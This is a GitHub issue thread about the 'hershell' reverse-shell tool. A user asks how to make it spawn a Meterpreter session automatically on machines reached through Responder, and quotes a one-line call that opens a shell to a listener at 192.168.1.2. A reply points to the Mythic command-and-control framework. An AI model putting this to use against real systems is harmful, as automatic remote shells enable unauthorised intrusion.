hershell icon indicating copy to clipboard operation
hershell copied to clipboard

Automaticly spawn meterpreter shell without interaction

Open vincentcox opened this issue 6 years ago • 2 comments

What should I modify in the code to automatically spawn a Meterpreter shell? For example if you use responder to launch the executable, only the first computer will be able to spawn a shell. That's why I want to let it spawn immediately to Meterrpreter.

I was thinking to put the following line in the source code (in the main code):

meterpreter.Meterpreter(transport, address)

But it doesn't seem to work.

Also if I try:

meterpreter.Meterpreter("https", "192.168.1.2")

Any idea what I do wrong?

vincentcox avatar Jan 27 '20 16:01 vincentcox

What should I modify in the code to automatically spawn a Meterpreter shell? For example if you use responder to launch the executable, only the first computer will be able to spawn a shell. That's why I want to let it spawn immediately to Meterrpreter.

I was thinking to put the following line in the source code (in the main code):

meterpreter.Meterpreter(transport, address)

But it doesn't seem to work.

Also if I try:

meterpreter.Meterpreter("https", "192.168.1.2")

Any idea what I do wrong?

hi can you resolve this problem ?

can you help me to use it ?

hesar101 avatar Apr 16 '24 08:04 hesar101

Never got an answer and the last code commits are from 5-6 years ago. I suggest you move on to other github projects which are maintained.

I suggest

https://github.com/its-a-feature/Mythic

https://mythicmeta.github.io/overview/

vincentcox avatar Apr 16 '24 09:04 vincentcox